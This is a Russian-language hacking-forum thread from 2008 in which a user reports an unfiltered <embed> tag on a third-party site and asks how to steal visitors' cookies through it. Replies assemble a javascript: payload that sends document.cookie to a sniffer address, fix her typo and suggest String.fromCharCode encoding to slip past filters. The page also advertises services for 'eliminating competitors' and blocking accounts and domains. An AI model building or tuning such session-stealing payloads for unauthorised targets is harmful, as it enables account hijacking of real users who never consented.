FORUMS
MEMBERS
RECENT POSTS
LOG IN
Search Forums
Featured Threads Archive
Recent Posts
Notable Members
Registered Members
Current Visitors
Recent Activity
New Profile Posts
×
Авторизация
Имя пользователя:
Пароль:
Запомнить меня
Нет аккаунта?
Регистрация
УСТРАНЕНИЕ КОНКУРЕНТОВ.
БЛОКИРОВКА ДОМЕНОВ,
БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ.
ПРОВЕРЕННЫЙ СЕЛЛЕР.
НОВЫЕ
ТОРГОВАЯ
НОВОСТИ
ЧАТ
loading...
Скрыть
ANTICHAT
>
БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ
>
Уязвимости
использование тега embed для угона cookies ?
Поиск по форуму
Расширенный поиск
Страница 1 из 2
1
2
>
Опции темы
Поиск в этой теме
Опции просмотра
использование тега embed для угона cookies ?
#
1
14.12.2008, 00:51
ickhz
Новичок
Регистрация: 01.12.2008
Сообщений: 7
С нами:
9180110
Репутация:
0
использование тега embed для угона cookies ?
Обнаружила, что на сайте на фильтруется тег <embed> и javascript в нем. ТО есть работает конструкция <embed src=javascript
:alert('ok');this.avi>.. Подскажите, как прописать здесь скрипт, чтобы работала передача cookies на сниффер античата.
𝕏 Twitter
Reddit
Telegram
Копировать ссылку
ickhz
Посмотреть профиль
Репутация
Отправить личное сообщение для ickhz
Найти все сообщения от ickhz
Добавить в друзья
#
2
14.12.2008, 00:53
Pashkela
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
С нами:
9649706
Репутация:
3338
также, как и обычно
Pashkela
Посмотреть профиль
Репутация
Отправить личное сообщение для Pashkela
Посетить домашнюю страницу Pashkela
Найти все сообщения от Pashkela
Добавить в друзья
#
3
14.12.2008, 01:06
Велемир
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
С нами:
10470131
Репутация:
142
Везде,где есть атрибут src,есть возможность эксплуатации XSS,не учитывая существования фильтров.
Велемир
Посмотреть профиль
Репутация
Найти все сообщения от Велемир
Добавить в друзья
#
4
14.12.2008, 01:07
-m0rgan-
Постоянный
Регистрация: 29.09.2008
Сообщений: 553
С нами:
9270510
Репутация:
519
В XSS не особо,но по моему так:
<embed src=javascript
:src='адрес снифера';this.avi>
-m0rgan-
Посмотреть профиль
Репутация
Отправить личное сообщение для -m0rgan-
Найти все сообщения от -m0rgan-
Добавить в друзья
#
5
14.12.2008, 01:16
Велемир
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
С нами:
10470131
Репутация:
142
+document.cookie
Велемир
Посмотреть профиль
Репутация
Найти все сообщения от Велемир
Добавить в друзья
#
6
14.12.2008, 01:19
-m0rgan-
Постоянный
Регистрация: 29.09.2008
Сообщений: 553
С нами:
9270510
Репутация:
519
Бля,точно,пропустил
спс за поправку!
-m0rgan-
Посмотреть профиль
Репутация
Отправить личное сообщение для -m0rgan-
Найти все сообщения от -m0rgan-
Добавить в друзья
#
7
14.12.2008, 01:29
Велемир
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
С нами:
10470131
Репутация:
142
Вообще,есть список *уязвимых* тегов касательно XSS.
http://www.inattack.ru/article/519.html
к примеру,но был список и получше...
Велемир
Посмотреть профиль
Репутация
Найти все сообщения от Велемир
Добавить в друзья
#
8
15.12.2008, 18:06
ickhz
Новичок
Регистрация: 01.12.2008
Сообщений: 7
С нами:
9180110
Репутация:
0
А, поняла, там фигня какая-то хитрая по-моему, которая не дает забрать cookies..
alert(document.cookies) выдает вместо cookies undefined
Типа защита такая что-ли))))
ickhz
Посмотреть профиль
Репутация
Отправить личное сообщение для ickhz
Найти все сообщения от ickhz
Добавить в друзья
#
9
15.12.2008, 19:31
freddi
Постоянный
Регистрация: 05.07.2006
Сообщений: 458
С нами:
10447337
Репутация:
807
ickhz
, он это выдает тк нету такого объекта, как document.cookie
s
, есть document.cookie.
freddi
Посмотреть профиль
Репутация
Отправить личное сообщение для freddi
Найти все сообщения от freddi
Добавить в друзья
#
10
15.12.2008, 19:34
iddqd
Banned
Регистрация: 19.12.2007
Сообщений: 924
С нами:
9681386
Репутация:
2145
попробуй прогнать скрипт через StringFromCharCode
http://pro.grammatic.org/post-javascript-eval-stringfromcharcode-encoder-11.aspx
iddqd
Посмотреть профиль
Репутация
Найти все сообщения от iddqd
Добавить в друзья
Страница 1 из 2
1
2
>
Предыдущая тема
Следующая тема
Похожие темы
Тема
Автор
Раздел
Ответов
Последнее сообщение
Создание сети: обжимка проводов
petrovich-lamer
Windows
13
02.07.2007
13:18
Программы для работы с железом. Часть I – настройка видеокарт
_GaLs_
"Железо"
2
20.12.2006
01:18
"Доктор Веб" выпустила новые версии антивирусов для ОС Unix/Linux
TTN_
Мировые новости. Обсуждения.
0
31.08.2006
21:20
Здесь присутствуют: 1
(пользователей: 0 , гостей: 1)
Опции темы
Версия для печати
Отправить по электронной почте
Опции просмотра
Линейный вид
Комбинированный вид
Древовидный вид
Поиск в этой теме
Расширенный поиск
Оценка этой темы
Вы уже оценили эту тему
Быстрый переход
Мой кабинет
Личные сообщения
Подписки
Кто на форуме
Поиск по форуму
Главная страница форума
ИНФО
Мировые новости. Обсуждения.
Статьи
Избранное
РАЗРАБОТКА
Ваши проекты
SЕО - тонкости, методы раскрутки
Услуги, Покупка и Продажа в SEO
Хостинги - Hostings
Хостинг, Dedicated, VDS, Сервера - покупка, продажа
Для Администратора
Apple: Mac, OS X, iOS
AntiDDos - АнтиДДОС
Windows
Linux, Freebsd, *nix
ПРОГРАММИРОВАНИЕ
Общие вопросы программирования
ПО для Web разработчика
PHP
Python
С/С++, C#, Rust, Swift, Go, Java, Perl, Ruby
Реверсинг
ТЕХНОЛОГИИ И AI
Искусственный интеллект (AI)
Нейросети и промптинг
AI автоматизация
Разработка AI-агентов
Технологические новости
Стартапы, бизнес и инвестиции
Программирование с AI
ФИНАНСОВЫЕ ЗАДАЧИ/СОЦИАЛЬНЫЕ СЕТИ
Покупка, Продажа, Обмен
Разное - Покупка, продажа, обмен
Услуги, Покупка и Продажа в SEO
Электронные валюты: Обмен, Вывод, Ввод
VPN, Proxy, Socks - Покупка, продажа
Хостинг, Dedicated, VDS, Сервера - Покупка, продажа
Мобильная связь, СМС - Покупка, продажа
Трафик, инсталлы, загрузки - Покупка, продажа
Покупка, продажа, услуги в Соц. Сетях
Партнерки
Freelance - О Работе
Предложения работы, услуг
Социальные сети
Покупка, продажа, услуги в Соц. Сетях
Платежные системы
Электронные валюты: Обмен, Вывод, Ввод
Blockchain, Криптовалюты, смарт-контракты
ТЕНЕВОЙ РЫНОК
Пробив информации
Карты, кошельки, биржи
Документы готовые и под заказ
Способы и схемы заработка
Арбитраж трафика
Барахолка
ОФФТОП
Болталка
Forum for discussion of ANTICHAT
Video.Antichat
Комментарии к видео
Архив
ICQ - Покупка, продажа
Home
Contact Us
Help
Terms and Rules
Privacy Policy
ANTICHAT ™ © 2001- Antichat Kft.